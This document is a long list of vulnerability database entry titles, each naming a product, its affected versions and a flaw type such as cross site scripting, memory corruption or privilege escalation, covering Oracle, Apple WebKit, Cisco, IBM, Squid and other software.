[153809] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0/12.2.1.4.0 privilege escalation
[153691] Squid Web Proxy up to 4.7 weak authentication
[153690] Squid Web Proxy up to 4.7 privilege escalation
[153689] Squid Web Proxy up to 4.7 ESI Parser memory corruption
[153688] Squid Web Proxy up to 4.7/5.0 Cache privilege escalation
[153687] Squid Web Proxy up to 4.7 ESI ESIExpression::Evaluate memory corruption
[153559] Oracle Knowledge up to 8.6.3 Web Applications cross site scripting
[153558] Oracle Knowledge up to 8.6.3 Information Manager Console/Web Applications cross site scripting
[153553] Oracle Knowledge up to 8.6.3 Web Applications privilege escalation
[153551] Oracle Knowledge up to 8.6.3 Web Applications denial of service
[153550] Oracle Knowledge up to 8.6.3 Web Applications unknown vulnerability
[153549] Oracle Knowledge up to 8.6.3 Information Manager Console/Web Applications privilege escalation
[153528] Oracle Hyperion Financial Reporting 11.1.2.4 Web Based Report Designer information disclosure
[153518] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0/12.2.1.4.0 Console unknown vulnerability
[153513] Oracle WebLogic Server 10.3.6.0.0 Management Services information disclosure
[153512] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0/12.2.1.4.0 Console information disclosure
[153505] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0/12.2.1.4.0 Console unknown vulnerability
[153504] Oracle WebCenter Sites 12.2.1.3.0 Advanced UI cross site scripting
[153500] Oracle HTTP Server 11.1.1.9.0 Web Listener unknown vulnerability
[153499] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0/12.2.1.4.0 WLS Web Services unknown vulnerability
[153494] Oracle WebCenter Sites 12.2.1.3.0 Advanced UI information disclosure
[153493] Oracle WebLogic Server 10.3.6.0.0 WLS Web Services information disclosure
[153492] Oracle WebCenter Portal 11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Security Framework denial of service
[153482] Oracle WebLogic Server 12.1.3.0.0/12.2.1.3.0/12.2.1.4.0 Web Container unknown vulnerability
[153481] Oracle HTTP Server 11.1.1.9.0 Web Listener memory corruption
[153479] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0/12.2.1.4.0 Core unknown vulnerability
[153478] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0/12.2.1.4.0 Core unknown vulnerability
[153477] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0/12.2.1.4.0 Core unknown vulnerability
[153476] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 Console privilege escalation
[153475] Oracle WebCenter Sites 12.2.1.3.0/12.2.1.4.0 privilege escalation
[153474] Oracle WebCenter Portal 12.2.1.3.0/12.2.1.4.0 Security Framework privilege escalation
[153468] Oracle Business Intelligence Enterprise Edition 5.5.0.0.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Analytics Web General unknown vulnerability
[153458] Oracle Insurance Accounting Analyzer 8.0.6/8.0.7/8.0.8/8.0.9 User Interface unknown vulnerability
[153457] Oracle Financial Services Profitability Management 8.0.6/8.0.7 User Interface unknown vulnerability
[153456] Oracle Financial Services Price Creation/Discovery 8.0.7 User Interface unknown vulnerability
[153455] Oracle Financial Services Loan Loss Forecasting 8.0.6/8.0.7/8.0.8 User Interface unknown vulnerability
[153454] Oracle Financial Services Liquidity Risk Measurement 8.0.7/8.0.8 User Interface unknown vulnerability
[153453] Oracle Financial Services Liquidity Risk Management 8.0.6 User Interfaces unknown vulnerability
[153452] Oracle Financial Services Hedge Management 8.0.6/8.0.7/8.0.8 User Interface unknown vulnerability
[153451] Oracle Financial Services Funds Transfer Pricing 8.0.6/8.0.7 User Interface unknown vulnerability
[153450] Oracle 8.0.7/8.0.8 User Interfaces unknown vulnerability
[153449] Oracle Financial Services Data Foundation 8.0.6/8.0.7/8.0.8/8.0.9 User Interface unknown vulnerability
[153448] Oracle Financial Services Balance Sheet Planning 8.0.8 User Interface unknown vulnerability
[153447] Oracle Financial Services Asset Liability Management 8.0.6/8.0.7 User Interface unknown vulnerability
[153334] Oracle Communications Operations Monitor 3.4.0/4.0.0/4.1.0/4.2.0/4.3.0 VSP Webserver privilege escalation
[153332] Oracle Communications WebRTC Session Controller 7.2 WSC-Console cross site scripting
[153315] Oracle Communications ASAP Cartridges 7.2/7.3 Web Service privilege escalation
[153158] SAP Business Intelligence Platform 4.1/4.2 dswsbobje Web Application information disclosure
[153075] Cisco Webex Meeting Multimedia Viewer privilege escalation
[153066] Cisco Webex Business Suite up to 39.0 weak authentication
[153036] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 SOAP Connector privilege escalation
[153016] Advantech WebAccess/NMS up to 3.0.1 directory traversal
[153015] Advantech WebAccess/NMS up to 3.0.1 XML Data XML External Entity
[153014] Advantech WebAccess/NMS up to 3.0.1 weak authentication
[153013] Advantech WebAccess/NMS up to 3.0.1 sql injection
[153012] Advantech WebAccess/NMS up to 3.0.1 File Upload privilege escalation
[153011] Advantech WebAccess/NMS up to 3.0.1 directory traversal
[153010] Advantech WebAccess/NMS up to 3.0.1 sql injection
[153009] Advantech WebAccess/NMS up to 3.0.1 privilege escalation
[153005] Broadcom ProxySG/ASG Management Interface Session Hijacking weak authentication
[152938] GitLab Community Edition/Enterprise Edition up to 12.9 Web UI/GraphQL API information disclosure
[152850] Honeywell Notifier Web Server 3.50 directory traversal
[152721] IBM WebSphere Application Server Liberty up to 20.0.0.3 Web UI cross site scripting
[152720] IBM WebSphere Application Server Liberty up to 20.0.0.3 Web UI cross site scripting
[152683] Tiki-Wiki CMS up to 20.0 Web Page cross site scripting
[152656] pfSense up to 2.4.4 WebGUI system_usermanager_addprivs.php Stored cross site scripting
[152634] Advantech WebAccess 8.3.4 RPC privilege escalation
[152629] Apple iCloud up to 7.17 on Windows WebKit Page Loading Incorrect Control Flow
[152628] Apple iCloud up to 7.17 on Windows WebKit cross site scripting
[152627] Apple iCloud up to 7.17 on Windows WebKit denial of service
[152626] Apple iCloud up to 7.17 on Windows WebKit privilege escalation
[152625] Apple iCloud up to 7.17 on Windows WebKit memory corruption
[152624] Apple iCloud up to 7.17 on Windows WebKit race condition
[152623] Apple iCloud up to 7.17 on Windows WebKit memory corruption
[152622] Apple iCloud up to 7.17 on Windows WebKit memory corruption
[152621] Apple iCloud up to 7.17 on Windows WebKit privilege escalation
[152620] Apple iCloud up to 7.17 on Windows WebKit privilege escalation
[152616] Apple iCloud up to 10.9.2 on Windows WebKit Page Loading Incorrect Control Flow
[152615] Apple iCloud up to 10.9.2 on Windows WebKit cross site scripting
[152614] Apple iCloud up to 10.9.2 on Windows WebKit denial of service
[152613] Apple iCloud up to 10.9.2 on Windows WebKit memory corruption
[152612] Apple iCloud up to 10.9.2 on Windows WebKit privilege escalation
[152611] Apple iCloud up to 10.9.2 on Windows WebKit race condition
[152610] Apple iCloud up to 10.9.2 on Windows WebKit memory corruption
[152609] Apple iCloud up to 10.9.2 on Windows WebKit memory corruption
[152608] Apple iCloud up to 10.9.2 on Windows WebKit privilege escalation
[152607] Apple iCloud up to 10.9.2 on Windows WebKit privilege escalation
[152549] Apple watchOS up to 6.1.3 WebKit privilege escalation
[152548] Apple watchOS up to 6.1.3 WebKit privilege escalation
[152547] Apple watchOS up to 6.1.3 WebKit memory corruption
[152546] Apple watchOS up to 6.1.3 WebKit memory corruption
[152532] Apple tvOS up to 13.3.1 WebKit Page Loading Incorrect Control Flow
[152531] Apple tvOS up to 13.3.1 WebKit privilege escalation
[152530] Apple tvOS up to 13.3.1 WebKit memory corruption
[152529] Apple tvOS up to 13.3.1 WebKit weak authentication
[152528] Apple tvOS up to 13.3.1 WebKit privilege escalation
[152527] Apple tvOS up to 13.3.1 WebKit cross site scripting
[152526] Apple tvOS up to 13.3.1 WebKit denial of service
[152525] Apple tvOS up to 13.3.1 WebKit race condition
[152524] Apple tvOS up to 13.3.1 WebKit memory corruption
[152523] Apple tvOS up to 13.3.1 WebKit memory corruption
[152470] IBM Tivoli Netcool Impact up to 7.1.0.17 Web UI cross site scripting
[152396] Advantech WebAccess up to 8.4.2 memory corruption
[152386] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 SOAP Connector privilege escalation
[152364] SonicWALL SMA1000 up to 12.1.0-06411 HTTP Extraweb Server unknown vulnerability
[152253] Moxa EDS-G516E up to 5.2 Web Application weak encryption
[152249] Moxa PT-7528/PT-7828 Web Server memory corruption
[152241] Notifier Web Server up to 3.50 weak authentication
[152181] IBM Tivoli Netcool Impact up to 7.1.0.17 Web UI cross site scripting
[152063] Horde Groupware Webmail Edition 5.2.22 add.php privilege escalation
[152062] Horde Groupware Webmail Edition 5.2.22 edit.php directory traversal
[152054] Schneider Electric Andover Continuum Web Server cross site scripting
[152053] Schneider Electric Andover Continuum Web Server cross site scripting
[152010] Netgear GS728TPS up to 5.3.0.35 Web Administration Panel weak authentication
[151959] Tesla Model 3 up to 2020.4.9 Driving Interface privilege escalation
[151953] Squid Web Proxy up to 4.8 cachemgr.cgi privilege escalation
[151933] signotec signoPAD-API-Web up to 3.1.0 Websocket denial of service
[151931] signotec signoPAD-API-Web up to 3.1.0 on Windows WebSocket privilege escalation
[151920] CMS Made Simple 2.2.13 Filemanager moduleinterface.php Stored cross site scripting
[151868] Cisco SD-WAN Solution vManage Web UI privilege escalation
[151812] Solarwinds Serv-U Managed File Transfer up to 15.1.6 Hotfix 1 Web Client cross site request forgery
[151765] cPanel up to 84.0.19 WebMail privilege escalation
[151759] cPanel up to 84.0.19 WebDisk UAPI privilege escalation
[151754] cPanel up to 82.0.17 WebDAV weak authentication
[151747] cPanel up to 82.0.17 WebMail weak authentication
[151340] Moxa MGate MB3180 Web Service information disclosure
[151338] Moxa MGate MB3180 Web Server weak encryption
[151337] Moxa MGate MB3180 Web Server memory corruption
[151336] Moxa MGate MB3180 Web Server memory corruption
[151276] IBM InfoSphere Information Server 11.5/11.7 Web UI cross site scripting
[151228] IBM Tivoli Workload Scheduler 9.3 Web UI cross site scripting
[151177] Lexmark C/M/X/6500e Embedded Web Server directory traversal
[151147] Microsoft Windows up to Server 2019 Network Driver Interface Specification information disclosure
[150968] Lexmark Product Embedded Web Server Stored cross site scripting
[150967] Lexmark Product Embedded Web Server Reflected cross site scripting
[150867] Cisco Webex Meetings Client on macOS mDNS information disclosure
[150860] Cisco WebEx Network Recording Player/Webex Player on Windows privilege escalation
[150859] Cisco WebEx Network Recording Player/Webex Player on Windows privilege escalation
[150833] IBM Tivoli Netcool/OMNIbus_GUI 8.1.0 Web UI cross site scripting
[150831] IBM Tivoli Netcool/OMNIbus_GUI 8.1.0 Web UI cross site scripting
[150809] Netgear WNR1000V4 up to 1.1.0.54 Web Management Console setup.cgi cross site request forgery
[150808] Netgear WNR1000V4 1.1.0.54 Web Management Console setup.cgi Stored cross site scripting
[150757] Webnus Modern Events Calendar Lite Plugin up to 5.1.6 on WordPress Stored cross site scripting
[150733] Pablo Quick 'n Easy Web Server 3.3.8 HTTP Service quickweb.exe memory corruption
[150694] Apple iCloud up to 10.9.1 on Windows WebKit Page Loading memory corruption
[150692] Apple iCloud up to 10.9.1 on Windows WebKit memory corruption
[150691] Apple iCloud up to 10.9.1 on Windows WebKit memory corruption
[150690] Apple iCloud up to 10.9.1 on Windows WebKit memory corruption
[150689] Apple iCloud up to 10.9.1 on Windows WebKit Universal cross site scripting
[150675] Apple tvOS up to 13.3.0 WebKit Page Loading memory corruption
[150674] Apple tvOS up to 13.3.0 WebKit Universal cross site scripting
[150673] Apple tvOS up to 13.3.0 WebKit memory corruption
[150672] Apple tvOS up to 13.3.0 WebKit memory corruption
[150671] Apple tvOS up to 13.3.0 WebKit memory corruption
[150614] Apple iCloud up to 7.16 on Windows WebKit Page Loading DOM-Based memory corruption
[150613] Apple iCloud up to 7.16 on Windows WebKit memory corruption
[150612] Apple iCloud up to 7.16 on Windows WebKit memory corruption
[150611] Apple iCloud up to 7.16 on Windows WebKit memory corruption
[150610] Apple iCloud up to 7.16 on Windows WebKit Universal cross site scripting
[150554] Cisco NX-OS Management Interface Improper Control of Resource Through Lifetime
[150540] IBM Sterling B2B Integrator Standard Edition up to 5.2.6.5 Web UI cross site scripting
[150539] IBM WebSphere Service Registry/Repository 8.5 information disclosure
[150511] 10Web Photo Gallery Plugin up to 1.5.45 on WordPress Stored cross site scripting
[150503] Moxa AWK-3131A 1.13 Web Authentication weak authentication
[150502] Moxa AWK-3131A 1.13 iw_webs privilege escalation
[150501] Moxa AWK-3131A 1.13 iw_webs memory corruption
[150497] Moxa AWK-3131A 1.13 iw_webs privilege escalation
[150496] Moxa AWK-3131A 1.13 iwwebs Reflected privilege escalation
[150343] IBM Maximo Asset Management 7.6.0/7.6.1 Web UI cross site scripting
[150333] Synacor Zimbra Collaboration Suite up to 8.8.15 Patch 6 WebEx Zimlet privilege escalation
[150299] Horde Groupware Webmail Edition 5.2.22 CSV Data privilege escalation
[150141] Lexmark MS812 Embedded Web Server Stored cross site scripting
[149975] Siemens SIMATIC S7-1200 CPU up to V4.1 Web Server denial of service
[149923] Microsoft Windows up to Server 2019 Network Driver Interface Specification information disclosure
[149914] Microsoft Exchange Server 2013 CU23/2016 CU14/2016 CU15/2019 CU3/2019 CU4 Exchange Web Services privilege escalation
[149859] Rumpus FTP Server 8.2.9.1 Web File Manager WebSettingsGeneralSet.html Stored cross site scripting
[149858] Rumpus FTP Server 8.2.9.1 Web File Manager TriggerServerFunction.html cross site request forgery
[149857] Rumpus FTP Server 8.2.9.1 Web File Manager TriggerServerFunction.html cross site request forgery
[149856] Rumpus FTP Server 8.2.9.1 Web File Manager RAPR/BlockedClients.html cross site request forgery
[149855] Rumpus FTP Server 8.2.9.1 Web File Manager EventNoticesSet.html cross site request forgery
[149854] Rumpus FTP Server 8.2.9.1 Web File Manager RAPR/FTPSettingsSet.html cross site request forgery
[149853] Rumpus FTP Server 8.2.9.1 Web File Manager WebSettingsGeneralSet.html cross site request forgery
[149852] Rumpus FTP Server 8.2.9.1 Web File Manager RAPR/FolderSetsSet.html cross site request forgery
[149851] Rumpus FTP Server 8.2.9.1 Web File Manager cross site request forgery
[149850] Rumpus FTP Server 8.2.9.1 Web File Manager Reflected cross site scripting
[149755] Bestwebsoft htaccess Plugin up to 1.8.1 on WordPress admin.php cross site request forgery
[149712] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 information disclosure
[149696] Squid Web Proxy up to 4.9 NTLM Authentication ext_lm_group_acl privilege escalation
[149695] Squid Web Proxy up to 4.9 Reverse Proxy memory corruption
[149694] Squid Web Proxy up to 4.9 information disclosure
[149678] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 File Name privilege escalation
[149668] IBM Security Identity Manager 6.0.0 Web UI cross site scripting
[149650] Squid Web Proxy up to 4.9 FTP Server information disclosure
[149611] Icewarp WebMail Server up to 11.4.4.1 /webmail/ cross site scripting
[149598] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 denial of service
[149535] WebSphere Deployer Plugin up to 1.6.1 on Jenkins XML Parser XML External Entity
[149411] TOTOLINK/CIK TELECOM/KCTVJEJU/Hi-Wifi/HCN/T-broad Router Administration Interface Config information disclosure
[149365] Cisco Webex Meetings Suite/Webex Meetings Online privilege escalation
[149361] Cisco Webex Teams Client on Windows denial of service
[149343] Cisco SD-WAN Solution WebUI privilege escalation
[149258] Forcepoint Web Security 8.x Header cross site scripting
[149125] Amcrest Web Server 2.520.AC00.18.R 2017-06-29 WEB 3.2.1.453504 weak authentication
[149047] Juniper Junos J-Web cross site scripting
[149046] Juniper Junos J-Web directory traversal
[149024] Adobe Experience Manager up to 6.5 User Interface information disclosure
[149015] Oracle Secure Global Desktop 5.4/5.5 Web Server cross site scripting
[148997] Oracle Secure Global Desktop 5.4/5.5 Web Services privilege escalation
[148987] Oracle Agile PLM Framework 37689 Web Services privilege escalation
[148904] Oracle JD Edwards EnterpriseOne Tools 9.2 Web Runtime SEC cross site scripting
[148903] Oracle JD Edwards EnterpriseOne Tools 9.2 Web Runtime SEC cross site scripting
[148902] Oracle JD Edwards EnterpriseOne Tools 9.2 Web Runtime SEC information disclosure
[148874] Oracle Health Sciences Data Management Workbench 2.4/2.5 User Interface unknown vulnerability
[148866] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0/12.2.1.4.0 Console denial of service
[148865] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0/12.2.1.4.0 Console unknown vulnerability
[148863] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0 WLS Core Components unknown vulnerability
[148862] Oracle WebLogic Server 10.3.6.0.0 WLS Core Components unknown vulnerability
[148861] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0/12.2.1.4.0 Console unknown vulnerability
[148852] Oracle Business Intelligence Enterprise Edition 11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Analytics Server/Analytics Web General information disclosure
[148851] Oracle WebCenter Sites 12.2.1.3.0 Advanced UI unknown vulnerability
[148848] Oracle HTTP Server 11.1.1.9.0/12.1.3.0.0/12.2.1.3.0 Web Listener unknown vulnerability
[148843] Oracle WebCenter Sites 12.2.1.3.0 Advanced UI denial of service
[148841] Oracle WebLogic Server 10.3.6.0.0 WLS Core Components unknown vulnerability
[148839] Oracle WebLogic Server 12.2.1.3.0/12.2.1.4.0 Third Party Tools denial of service
[148838] Oracle WebLogic Server 12.2.1.3.0/12.2.1.4.0 Web Container information disclosure
[148832] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0 Application Container - JavaEE unknown vulnerability
[148831] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0/12.2.1.4.0 WLS Core Components unknown vulnerability
[148806] Oracle Financial Services Funds Transfer Pricing up to 8.0.7 Web Service privilege escalation
[148803] Oracle Enterprise Manager Base Platform 12.1.0.5/13.2.0.0/13.3.0.0 Command Line Interface unknown vulnerability
[148798] Oracle Enterprise Manager for Database 12.1.0.5/13.2.0.0/13.3.0.0 Change Manager - web based denial of service
[148764] Oracle Application Testing Suite 12.5.0.3/13.1.0.1/13.2.0.1/13.3.0.1 Load Testing for Web Apps cross site scripting
[148759] Oracle Application Testing Suite 12.5.0.3/13.1.0.1/13.2.0.1/13.3.0.1 Load Testing for Web Apps denial of service
[148757] Oracle Application Testing Suite 12.5.0.3/13.1.0.1/13.2.0.1/13.3.0.1 Load Testing for Web Apps unknown vulnerability
[148731] Oracle WebAccess unknown vulnerability
[148728] Oracle Web Access cross site scripting
[148602] InAppBrowser Webview on Android gap-iab URI privilege escalation
[148590] CTHthemes CityBook Theme on WordPress Website Persistent cross site scripting
[148571] Cisco IOS/IOS XE up to 16.1.0 Web UI cross site request forgery
[148383] TP-LINK TL-WR841N Web Service memory corruption
[148285] Icewarp WebMail Server up to 12.2.1.0 Object Note cross site scripting
[148284] Icewarp WebMail Server up to 12.2.1.0 Contact Note cross site scripting
[148275] Telos Automated Message Handling System up to 4.1.5.4 Web Page Generator ModalWindowPopup.asp cross site scripting
[148273] Telos Automated Message Handling System up to 4.1.5.4 Web Page Generator uploaditem.asp cross site scripting
[147943] IBM Cognos Analytics 11.0/11.1 Web UI cross site scripting
[147882] OpenShift Enterprise 1.2 Web Console cross site request forgery
[147838] Video Comments Webcam Recorder Plugin up to 1.54 on WordPress r_logout.php cross site scripting
[147821] Insteon Hub 2242-222 Web/API privilege escalation
[147590] IBM Financial Transaction Manager 3.0 Web UI cross site scripting
[147586] IBM Cognos Analytics 11.0/11.1 Web UI cross site scripting
[147444] Apple macOS 10.14 Web Page History information disclosure
[147291] WebSphere Deployer Plugin up to 1.6.1 on Jenkins SSL/TLS Certificate Validator weak authentication
[147290] WebSphere Deployer Plugin up to 1.6.1 on Jenkins cross site request forgery
[147289] WebSphere Deployer Plugin up to 1.6.1 on Jenkins Permission Check privilege escalation
[147236] Solarwinds Serv-U FTP Server 15.1.7 Web UI Stored cross site scripting
[147235] Solarwinds Serv-U FTP Server 15.1.7 Web UI privilege escalation
[147177] eGain Web Email API 11+ Message /system/ws/v11/ss/email Header Injection privilege escalation
[147153] Advantech WebAccess up to 8.4.2 memory corruption
[147137] Siemens SPPA-T3000 Application Server Web Services Directory information disclosure
[147093] Siemens SPPA-T3000 Application Server RMI interface privilege escalation
[147027] Avaya IP Office Application Server up to 10.x Web UI cross site scripting
[147019] IBM Spectrum Scale 4.2/5.0 Web UI cross site scripting
[146943] JBossWeb Bayeux Reflected cross site scripting
[146852] IBM WebSphere Application Server Web UI cross site scripting
[146643] Goahead Web Server 3.6.5/4.1.1/5.0.1 Multi-Part Request denial of service
[146642] Goahead Web Server 3.6.5/4.1.1/5.0.1 Multi-Part Request memory corruption
[146639] IBM Cloud Pak System 2.3/2.3.0.1 Web UI cross site scripting
[146638] IBM Cloud Pak System 2.3/2.3.0.1 Web UI cross site scripting
[146636] IBM Cloud Pak System 2.3/2.3.0.1 Web UI cross site scripting
[146634] IBM Cloud Pak System 2.3/2.3.0.1 Web UI cross site scripting
[146433] Squid Web Proxy up to 2.x/3.x/4.8 HTTP Digest Authentication information disclosure
[146432] Squid Web Proxy up to 3.x/4.8 URL privilege escalation
[146431] Squid Web Proxy up to 3.x/4.8 Hostname cross site request forgery
[146430] Squid Web Proxy up to 3.x/4.8 URI Scheme privilege escalation
[146397] Kaspersky Anti-Virus up to 2020 Web Protection Redirect
[146396] Kaspersky Anti-Virus up to 2020 Web Protection information disclosure
[146394] Kaspersky Anti-Virus up to 2020 Web Protection privilege escalation
[146389] Squid Web Proxy up to 4.8 URN Response memory corruption
[146388] Squid Web Proxy up to 4.8 Access Check privilege escalation
[146338] Cisco Webex Meeting WebEx Network Recording Admin Page privilege escalation
[146332] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption
[146331] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption
[146317] Ruby up to 1.8.7/1.9.2 Log File WEBrick::HTTPRequest privilege escalation
[146169] IBM Tivoli Netcool Impact up to 7.1.0.16 Web UI cross site scripting
[146153] Sangoma Asterisk/Certified Asterisk Asterisk Manager Interface manager.c privilege escalation
[146010] Schneider Electric Andover Continuum Web Server cross site scripting
[146009] Schneider Electric Modicon M340 CPU Web Server information disclosure
[146002] CODESYS Web Server up to 3.5.15.19 memory corruption
[145571] Moodle up to 2.2.1 Web Services privilege escalation
[145490] Enghouse Web Chat 6.2.284.34 Remote File Inclusion information disclosure
[145489] Enghouse Web Chat 6.1.300.31/6.2.284.34 cross site scripting
[145488] Enghouse Web Chat 6.1.300.31/6.2.284.34 Chat Log privilege escalation
[145487] Enghouse Web Chat 6.1.300.31 privilege escalation
[145282] IBM Cognos Analytics 11.0/11.1 Web UI cross site scripting
[145281] IBM QRadar 7.3.0/7.3.1/7.3.2 Web UI cross site scripting
[145278] IBM QRadar 7.3.0/7.3.1/7.3.2 Web UI cross site scripting
[145277] IBM QRadar 7.3.0/7.3.1/7.3.2 Web UI cross site scripting
[145249] IBM Cognos Analytics 11.0/11.1 Web Server privilege escalation
[145101] TYPO3 up to 4.3.11/4.4.8/4.5.3 Webserver privilege escalation
[144988] Cisco TelePresence Advanced Media Gateway Web Application privilege escalation
[144969] Horde Groupware Webmail Edition up to 5.1.2 basic.php cross site request forgery
[144944] Horde Groupware Webmail Edition 5.1.2 Permission edit.php cross site request forgery
[144943] Horde Groupware Webmail Edition Virtual Address Book search.php cross site request forgery
[144798] F5 BIG-IP up to 11.6.5.1/12.1.5/13.1.3.1 Traffic Management User Interface Reflected cross site scripting
[144649] Apple iCloud up to 10.7 on Windows WebKit Process Model memory corruption
[144648] Apple iCloud up to 10.7 on Windows WebKit memory corruption
[144647] Apple iCloud up to 10.7 on Windows WebKit memory corruption
[144646] Apple iCloud up to 10.7 on Windows WebKit memory corruption
[144645] Apple iCloud up to 10.7 on Windows WebKit memory corruption
[144644] Apple iCloud up to 10.7 on Windows WebKit memory corruption
[144643] Apple iCloud up to 10.7 on Windows WebKit memory corruption
[144642] Apple iCloud up to 10.7 on Windows WebKit memory corruption
[144641] Apple iCloud up to 10.7 on Windows WebKit memory corruption
[144640] Apple iCloud up to 10.7 on Windows WebKit memory corruption
[144639] Apple iCloud up to 10.7 on Windows WebKit memory corruption
[144638] Apple iCloud up to 10.7 on Windows WebKit memory corruption
[144637] Apple iCloud up to 10.7 on Windows WebKit memory corruption
[144636] Apple iCloud up to 10.7 on Windows WebKit Universal cross site scripting
[144633] Apple iCloud up to 7.14 on Windows WebKit Process Model memory corruption
[144632] Apple iCloud up to 7.14 on Windows WebKit memory corruption
[144631] Apple iCloud up to 7.14 on Windows WebKit memory corruption
[144630] Apple iCloud up to 7.14 on Windows WebKit memory corruption
[144629] Apple iCloud up to 7.14 on Windows WebKit memory corruption
[144628] Apple iCloud up to 7.14 on Windows WebKit memory corruption
[144627] Apple iCloud up to 7.14 on Windows WebKit memory corruption
[144626] Apple iCloud up to 7.14 on Windows WebKit memory corruption
[144625] Apple iCloud up to 7.14 on Windows WebKit memory corruption
[144624] Apple iCloud up to 7.14 on Windows WebKit memory corruption
[144589] Apple watchOS up to 6.0.1 WebKit memory corruption
[144588] Apple watchOS up to 6.0.1 WebKit memory corruption
[144587] Apple watchOS up to 6.0.1 WebKit memory corruption
[144586] Apple watchOS up to 6.0.1 WebKit memory corruption
[144585] Apple watchOS up to 6.0.1 WebKit memory corruption
[144584] Apple watchOS up to 6.0.1 WebKit memory corruption
[144583] Apple watchOS up to 6.0.1 WebKit memory corruption
[144582] Apple watchOS up to 6.0.1 WebKit memory corruption
[144581] Apple watchOS up to 6.0.1 WebKit Universal cross site scripting
[144527] Apple tvOS up to 13.0 WebKit Process Model memory corruption
[144526] Apple tvOS up to 13.0 WebKit memory corruption
[144525] Apple tvOS up to 13.0 WebKit memory corruption
[144524] Apple tvOS up to 13.0 WebKit memory corruption
[144523] Apple tvOS up to 13.0 WebKit memory corruption
[144522] Apple tvOS up to 13.0 WebKit memory corruption
[144521] Apple tvOS up to 13.0 WebKit memory corruption
[144520] Apple tvOS up to 13.0 WebKit memory corruption
[144519] Apple tvOS up to 13.0 WebKit memory corruption
[144518] Apple tvOS up to 13.0 WebKit memory corruption
[144517] Apple tvOS up to 13.0 WebKit memory corruption
[144516] Apple tvOS up to 13.0 WebKit memory corruption
[144515] Apple tvOS up to 13.0 WebKit memory corruption
[144514] Apple tvOS up to 13.0 WebKit Universal cross site scripting
[144157] Horde Groupware Webmail Edition up to 5.2.22 Trean trean/ cross site request forgery
[144151] IBM Maximo Asset Management 7.6 Web UI cross site scripting
[144150] IBM Cloud Orchestrator/Cloud Orchestrator Enterprise up to 2.5.0.9 Web UI cross site scripting
[144131] Horde Groupware Webmail Edition up to 5.2.22 Tag Cloud user.php cross site scripting
[144078] Jenkins Deploy WebLogic Plugin Permission Check privilege escalation
[144077] Deploy WebLogic Plugin on Jenkins cross site request forgery
[144019] indieweb-post-kinds Plugin up to 1.3.1.0 on WordPress genericons/example.html cross site scripting
[144004] Citrix Application Delivery Controller/Gateway up to 10.5/11.1/12.0/12.1 Management Interface weak authentication
[143832] D-Link DIR-866L 1.03B04 Common Gateway Interface HtmlResponseMessage cross site scripting
[143643] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 Web Services information disclosure
[143641] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 TFA Collectorjackson-databind information disclosure
[143637] Oracle WebLogic Server 12.1.3.0.0/12.2.1.3.0 jQuery cross site scripting
[143636] Oracle WebLogic Server 12.2.1.3.0 JavaServer Faces cross site scripting
[143635] Oracle WebLogic Server 12.1.3.0.0/12.2.1.3.0 jQuery cross site scripting
[143634] Oracle WebLogic Server 12.2.1.3.0 OpenSSH information disclosure
[143633] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 jQuery cross site scripting
[143626] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 jackson-databind unknown vulnerability
[143617] Oracle WebCenter Portal 12.2.1.3.0 jackson-databind information disclosure
[143612] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 OpenSSL unknown vulnerability
[143567] Oracle up to 15.2.18/16.2.18/17.12.14/18.8.11 Web Access information disclosure
[143265] cPanel up to 82.0.14 WHM Update Preferences Interface cross site scripting
[143264] cPanel up to 82.0.14 WHM SSL Storage Manager Interface Stored cross site scripting
[143263] cPanel up to 82.0.14 SSL Key Delete Interface cross site scripting
[143212] Juniper Junos J-Web weak authentication
[143201] Juniper Junos J-Web Persistent cross site scripting
[142982] WebARX Plugin 1.3.0 on WordPress URI privilege escalation
[142981] WebARX Plugin 1.3.0 on WordPress Stored cross site scripting
[142966] Signal Messenger up to 4.47.7 WebRTC privilege escalation
[142934] KSLabs KSWEB 3.93 on Android Ajax privilege escalation
[142892] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 Stack Trace information disclosure
[142859] Cisco ASA/Firepower Threat Defense WebVPN denial of service
[142856] Cisco ASA/Firepower Threat Defense WebVPN Portal cross site scripting
[142852] Cisco FirePOWER Management Center Web UI privilege escalation
[142850] Cisco FirePOWER Management Center Web UI memory corruption
[142849] Cisco FirePOWER Management Center Web UI memory corruption
[142824] IBM Security Directory Server 6.4.0 Web UI cross site scripting
[142800] IBM Jazz Reporting Service up to 6.0.6.1 Web UI cross site scripting
[142799] IBM Jazz Reporting Service up to 6.0.6.1 Web UI cross site scripting
[142798] IBM Jazz Reporting Service up to 6.0.6.1 Web UI cross site scripting
